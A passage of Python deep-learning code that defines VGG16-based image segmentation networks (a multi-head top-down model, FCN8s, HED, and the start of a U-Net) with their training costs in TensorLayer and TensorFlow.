network4_conv = tl.layers.Conv2dLayer(network4, shape = [3, 3, 512, 64], act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_conv')
network_cmb4_5 = tl.layers.ConcatLayer([network4_conv,network5_up],
concat_dim = 3, name = 'concat_4_5') # output:[H/16,W/16,128]
network4_up = tl.layers.UpSampling2dLayer(network_cmb4_5,
size = [data_shape[0]//8,data_shape[1]//8], method =0,is_scale = False,name = 'upsample4' ) # output:[H/8,W/8,128]
'''top-down 3'''
network3_conv = tl.layers.Conv2dLayer(network3, shape = [3, 3, 256, 64], act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_conv') # output:[H/8,W/8,64]
network_cmb3_4 = tl.layers.ConcatLayer([network3_conv,network4_up],
concat_dim = 3, name = 'concat_3_4')# output:[H/8,W/8,192]
network3_up = tl.layers.UpSampling2dLayer(network_cmb3_4,
size = [data_shape[0]//4,data_shape[1]//4], method =0,is_scale = False,name = 'upsample3' ) # output:[H/4,W/4,192]
'''top-down 2'''
network2_conv = tl.layers.Conv2dLayer(network2, shape = [3, 3, 128, 64],act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_conv') # output:[H/4,W/4,64]
network_cmb2_3 = tl.layers.ConcatLayer([network2_conv,network3_up],
concat_dim = 3, name = 'concat_2_3')# output:[H/4,W/4,256]
network2_up = tl.layers.UpSampling2dLayer(network_cmb2_3,
size = [data_shape[0]//2,data_shape[1]//2], method =0,is_scale = False,name = 'upsample2' ) # output:[H/2,W/2,256]
'''top-down 1'''
network1_conv = tl.layers.Conv2dLayer(network1, shape = [3, 3, 64, 64], act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_conv') # output:[H/2,W/2,64]
network_cmb1_2 = tl.layers.ConcatLayer([network1_conv,network2_up],
concat_dim = 3, name = 'concat1_2')# output:[H/2,W/2,320]
network1_up = tl.layers.UpSampling2dLayer(network_cmb1_2,
size = [data_shape[0],data_shape[1]], method =0,is_scale = False,name = 'upsample1' ) # output:[H,W,320]
"""## cost of classification3"""
network_foreground = tl.layers.Conv2dLayer(network1_up,
shape = [3, 3, 320, 160], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='score3_feaconv') # output: (?, 14, 14, 64)
network_foreground = tl.layers.Conv2dLayer(network_foreground,
shape = [3, 3, 160, 2], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='output3') # output: (?, 14, 14, 64)
network_interval = tl.layers.Conv2dLayer(network2_up,
shape = [3, 3, 256, 128], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='score_interval_feaconv') # output: (?, 14, 14, 64)
network_interval = tl.layers.Conv2dLayer(network_interval,
shape = [3, 3, 128, 2], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='output_interval') # output: (?, 14, 14, 64)
network_interval =tl.layers.UpSampling2dLayer(network_interval,
size = [data_shape[0],data_shape[1]],
method =0,
is_scale = False,
name = 'output_interval_up' )
network_masker = tl.layers.Conv2dLayer(network3_up,
shape = [3, 3, 192, 96], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='score_masker_feaconv') # output: (?, 14, 14, 64)
network_masker = tl.layers.Conv2dLayer(network_masker,
shape = [3, 3, 96, 2], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='output_masker') # output: (?, 14, 14, 64)
network_masker =tl.layers.UpSampling2dLayer(network_masker,
size = [data_shape[0],data_shape[1]],
method =0,
is_scale = False,
name = 'output_masker_up' )
if is_train:
"""## cost of classification2"""
## merge all classification
network_final = Mergelayer([network_foreground,network_interval,network_masker],
name = 'mergeall' )
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*data_shape[0]*data_shape[1],2])
fw = tf.reshape(fw,[batch_size*data_shape[0]*data_shape[1]])
fw = fw*data_shape[0]*data_shape[1]*batch_size/tf.reduce_sum(fw)
im = tf.reshape(im,[batch_size*data_shape[0]*data_shape[1],2])
iw = tf.reshape(iw,[batch_size*data_shape[0]*data_shape[1]])
iw = iw*data_shape[0]*data_shape[1]*batch_size/tf.reduce_sum(iw)
mm= tf.reshape(mm,[batch_size*data_shape[0]*data_shape[1],2])
mw = tf.reshape(mw,[batch_size*data_shape[0]*data_shape[1]])
mw = mw*data_shape[0]*data_shape[1]*batch_size/tf.reduce_sum(mw)
#================cost foreground================================
y_foreground = network_foreground.outputs
y_foreground = tf.reshape(y_foreground,[batch_size*data_shape[0]*data_shape[1],2])
y_foreground_prob = tf.nn.softmax(y_foreground,name='softmax_foreground')
y_foreground_class = tf.argmax(y_foreground_prob, 1)
y_foreground_class = tf.reshape(y_foreground_class,[batch_size,data_shape[0],data_shape[1],1])
cost_foreground = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_foreground_prob),1),fw))
#================cost interval================================
y_interval = network_interval.outputs
y_interval = tf.reshape(y_interval,[batch_size*data_shape[0]*data_shape[1],2])
y_interval_prob = tf.nn.softmax(y_interval,name='softmax_interval')
y_interval_class = tf.argmax(y_interval_prob, 1)
y_interval_class = tf.reshape(y_interval_class,[batch_size,data_shape[0],data_shape[1],1])
cost_interval = -tf.reduce_mean(tf.multiply(tf.reduce_sum(im*tf.log(y_interval_prob),1),iw))
#================cost interval================================
y_masker = network_masker.outputs
y_masker = tf.reshape(y_masker,[batch_size*data_shape[0]*data_shape[1],2])
y_masker_prob = tf.nn.softmax(y_masker,name='softmax_interval')
y_masker_class = tf.argmax(y_masker_prob, 1)
y_masker_class = tf.reshape(y_masker_class,[batch_size,data_shape[0],data_shape[1],1])
cost_masker = -tf.reduce_mean(tf.multiply(tf.reduce_sum(mm*tf.log(y_masker_prob),1),mw))
#================fg & interval================================
y_refine_class = tf.logical_and(tf.cast(y_foreground_class,tf.bool),tf.logical_not(tf.cast(y_interval_class,tf.bool)))
cost = c[0]*cost_foreground+c[1]*cost_interval+c[2]*cost_masker
#================costall================================
return network_final,cost,y_foreground_class,y_interval_class, y_masker_class, y_refine_class
else:
network_final = Mergelayer([network_foreground,network_interval,network_masker],
name = 'mergeall' )
y_foreground = network_foreground.outputs
y_foreground = tf.reshape(y_foreground,[batch_size*data_shape[0]*data_shape[1],2])
y_foreground_prob = tf.nn.softmax(y_foreground,name='softmax_foreground')
y_foreground_class = tf.argmax(y_foreground_prob, 1)
y_foreground_prob = tf.reshape(y_foreground_prob,[batch_size, data_shape[0],data_shape[1],2])
y_foreground_prob = tf.slice(y_foreground_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_foreground_class = tf.reshape(y_foreground_class,[batch_size, data_shape[0],data_shape[1],1])
y_interval = network_interval.outputs
y_interval = tf.reshape(y_interval,[batch_size*data_shape[0]*data_shape[1],2])
y_interval_prob = tf.nn.softmax(y_interval,name='softmax_interval')
y_interval_class = tf.argmax(y_interval_prob, 1)
y_interval_class = tf.reshape(y_interval_class,[batch_size,data_shape[0],data_shape[1],1])
y_masker = network_masker.outputs
y_masker = tf.reshape(y_masker,[batch_size*data_shape[0]*data_shape[1],2])
y_masker_prob = tf.nn.softmax(y_masker,name='softmax_interval')
y_masker_class = tf.argmax(y_masker_prob, 1)
y_masker_class = tf.reshape(y_masker_class,[batch_size,data_shape[0],data_shape[1],1])
y_refine_class = tf.logical_and(tf.cast(y_foreground_class,tf.bool),tf.logical_not(tf.cast(y_interval_class,tf.bool)))
y_refine_prob = tf.multiply(y_foreground_prob,tf.cast(y_refine_class,tf.float32))
return network_final, y_foreground_class, y_foreground_prob, y_interval_class, y_masker_class, y_refine_class, y_refine_prob
def model_VGG16_FCN8s(x, y_,fw, batch_size, data_shape, reuse=False, mean_file_name=None,is_train = True, network_scopename = "VGG16_FCN8s" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
nx = data_shape[0]
ny = data_shape[1]
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
conv1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
conv1 = tl.layers.Conv2dLayer(conv1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
conv1 = tl.layers.BatchNormLayer(conv1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
pool1 = tl.layers.PoolLayer(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
conv2 = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
conv2 = tl.layers.Conv2dLayer(conv2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
conv2 = tl.layers.BatchNormLayer(conv2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
pool2 = tl.layers.PoolLayer(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
conv3 = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
conv3 = tl.layers.BatchNormLayer(conv3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
pool3 = tl.layers.PoolLayer(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
conv4 = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
conv4 = tl.layers.BatchNormLayer(conv4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
pool4 = tl.layers.PoolLayer(conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
""" conv5 """
conv5 = tl.layers.Conv2dLayer(pool4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_1')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_2')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_3')
conv5 = tl.layers.BatchNormLayer(conv5, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn5')
pool5 = tl.layers.PoolLayer(conv5, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool5')
fc6 = tl.layers.Conv2d(pool5, 256, (7, 7), act=tf.nn.relu, name='fc6')
#================drop=======================================
drop6 = tl.layers.DropoutLayer(fc6, keep=0.8, name='drop6',is_train=is_train)
fc7 = tl.layers.Conv2d(drop6, 256, (1, 1), act=tf.nn.relu, name='fc7')
#================drop=======================================
drop7 = tl.layers.DropoutLayer(fc7, keep=0.8, name='drop7',is_train=is_train)
score_fr = tl.layers.Conv2d(drop7 , 2, (1, 1), name='score_fr')
upscore2 = tl.layers.DeConv2d(score_fr, 2, (4, 4), (nx/16, ny/16), (2, 2), name='upscore2')
score_pool4 = tl.layers.Conv2d(pool4, 2, (1, 1), name='score_pool4')
fuse_pool4 = tl.layers.ElementwiseLayer([upscore2, score_pool4], combine_fn = tf.add, name='fuse_pool4')
upscore_pool4 = tl.layers.DeConv2d(fuse_pool4, 2, (4, 4), (nx/8, ny/8), (2, 2), name='upscore_pool4')
score_pool3 = tl.layers.Conv2d(pool3, 2, (1, 1), name='score_pool3')
fuse_pool3 = tl.layers.ElementwiseLayer([upscore_pool4, score_pool3], combine_fn = tf.add, name='fuse_pool3')
network = tl.layers.DeConv2d(fuse_pool3, 2, (16, 16), (nx, ny), (8, 8), name='upscore8')
if is_train:
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*nx*ny,2])
fw = tf.reshape(fw,[batch_size*nx*ny])
y = network.outputs
y = tf.reshape(y,[batch_size*nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
cost = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_prob),1),fw))
return network,cost,y_class
else:
y = network.outputs
y = tf.reshape(y,[nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_prob = tf.reshape(y_prob,[batch_size, data_shape[0],data_shape[1],2])
y_prob = tf.slice(y_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
return network,y_class, y_prob
def model_VGG16_HED(x, y_,fw, batch_size, data_shape, reuse=False, mean_file_name=None,is_train = True, network_scopename = "VGG16_HED" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
nx = data_shape[0]
ny = data_shape[1]
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
conv1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
conv1 = tl.layers.Conv2dLayer(conv1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
conv1 = tl.layers.BatchNormLayer(conv1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
pool1 = tl.layers.PoolLayer(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
conv2 = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
conv2 = tl.layers.Conv2dLayer(conv2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
conv2 = tl.layers.BatchNormLayer(conv2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
pool2 = tl.layers.PoolLayer(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
conv3 = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
conv3 = tl.layers.BatchNormLayer(conv3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
pool3 = tl.layers.PoolLayer(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
conv4 = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
conv4 = tl.layers.BatchNormLayer(conv4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
pool4 = tl.layers.PoolLayer(conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
""" conv5 """
conv5 = tl.layers.Conv2dLayer(pool4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_1')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_2')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_3')
conv5 = tl.layers.BatchNormLayer(conv5, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn5')
score_dsn1 = tl.layers.Conv2d(conv1, 2, (1, 1), name='score_dsn1')
score_dsn2 = tl.layers.Conv2d(conv2, 1, (1, 1), name='score_dsn2')
upsample_2 = tl.layers.DeConv2d(score_dsn2, 2, (4, 4), (nx, ny), (2, 2), name='upsample_2')
score_dsn3 = tl.layers.Conv2d(conv3, 1, (1, 1), name='score_dsn3')
upsample_3 = tl.layers.DeConv2d(score_dsn3, 2, (8, 8), (nx, ny), (4, 4), name='upsample_3')
score_dsn4 = tl.layers.Conv2d(conv4, 1, (1, 1), name='score_dsn4')
upsample_4 = tl.layers.DeConv2d(score_dsn4, 2, (16, 16), (nx, ny), (8, 8), name='upsample_4')
score_dsn5 = tl.layers.Conv2d(conv5, 1, (1, 1), name='score_dsn5')
upsample_5 = tl.layers.DeConv2d(score_dsn5, 2, (32, 32), (nx, ny), (16, 16), name='upsample_5')
concatall = tl.layers.ConcatLayer([score_dsn1,upsample_2,upsample_3,upsample_4,upsample_5], 3, name='concatall')
network = tl.layers.Conv2d(concatall, 2, (1, 1), name='output')
if is_train:
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*nx*ny,2])
fw = tf.reshape(fw,[batch_size*nx*ny])
y1 = score_dsn1.outputs
y1 = tf.reshape(y1,[batch_size*nx*ny,2])
y1_prob = tf.nn.softmax(y1)
cost1 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y1_prob),1),fw))
y2 = upsample_2.outputs
y2 = tf.reshape(y2,[batch_size*nx*ny,2])
y2_prob = tf.nn.softmax(y2)
cost2 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y2_prob),1),fw))
y3 = upsample_3.outputs
y3 = tf.reshape(y3,[batch_size*nx*ny,2])
y3_prob = tf.nn.softmax(y3)
cost3 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y3_prob),1),fw))
y4 = upsample_4.outputs
y4 = tf.reshape(y4,[batch_size*nx*ny,2])
y4_prob = tf.nn.softmax(y4)
cost4 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y4_prob),1),fw))
y5 = upsample_5.outputs
y5 = tf.reshape(y5,[batch_size*nx*ny,2])
y5_prob = tf.nn.softmax(y5)
cost5 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y5_prob),1),fw))
y = network.outputs
y = tf.reshape(y,[batch_size*nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
cost_fuse = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_prob),1),fw))
cost = cost1+cost2+cost3+cost4+cost5+5*cost_fuse
return network,cost,y_class
else:
y = network.outputs
y = tf.reshape(y,[nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_prob = tf.reshape(y_prob,[batch_size, data_shape[0],data_shape[1],2])
y_prob = tf.slice(y_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
return network,y_class, y_prob
def model_VGG16_Unet(x, y_,fw, batch_size, data_shape, reuse=False, mean_file_name=None,is_train = True, network_scopename = "VGG16_Unet" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
nx = data_shape[0]
ny = data_shape[1]
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
conv1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
conv1 = tl.layers.Conv2dLayer(conv1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
conv1 = tl.layers.BatchNormLayer(conv1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
pool1 = tl.layers.PoolLayer(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
conv2 = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
conv2 = tl.layers.Conv2dLayer(conv2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
conv2 = tl.layers.BatchNormLayer(conv2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
pool2 = tl.layers.PoolLayer(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
conv3 = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
conv3 = tl.layers.BatchNormLayer(conv3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
pool3 = tl.layers.PoolLayer(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
conv4 = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
